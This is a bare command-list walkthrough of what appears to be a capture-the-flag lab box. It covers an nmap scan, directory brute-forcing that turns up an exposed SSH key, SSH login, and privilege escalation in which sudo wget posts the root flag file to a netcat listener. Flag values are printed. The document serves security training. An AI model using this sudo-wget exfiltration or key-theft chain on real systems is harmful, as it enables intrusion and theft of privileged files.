-nmap -sC -sV ip 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_  256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


-gobuster dir -u ip -w wordlist txt 

/.ssh


-nano id_rsa2

-chmod 600 id_rsa2

-ssh -i id_rsa2 jessie@ip

-cat user.txt
057c67131c3d5e42dd5cd3075b198ff6

-nc -lvnp 4545

-sudo /usr/bin/wget --post-file=/root/root_flag.txt ip  

-cat flag.txt
b1b968b37519ad1daa6408188649263d
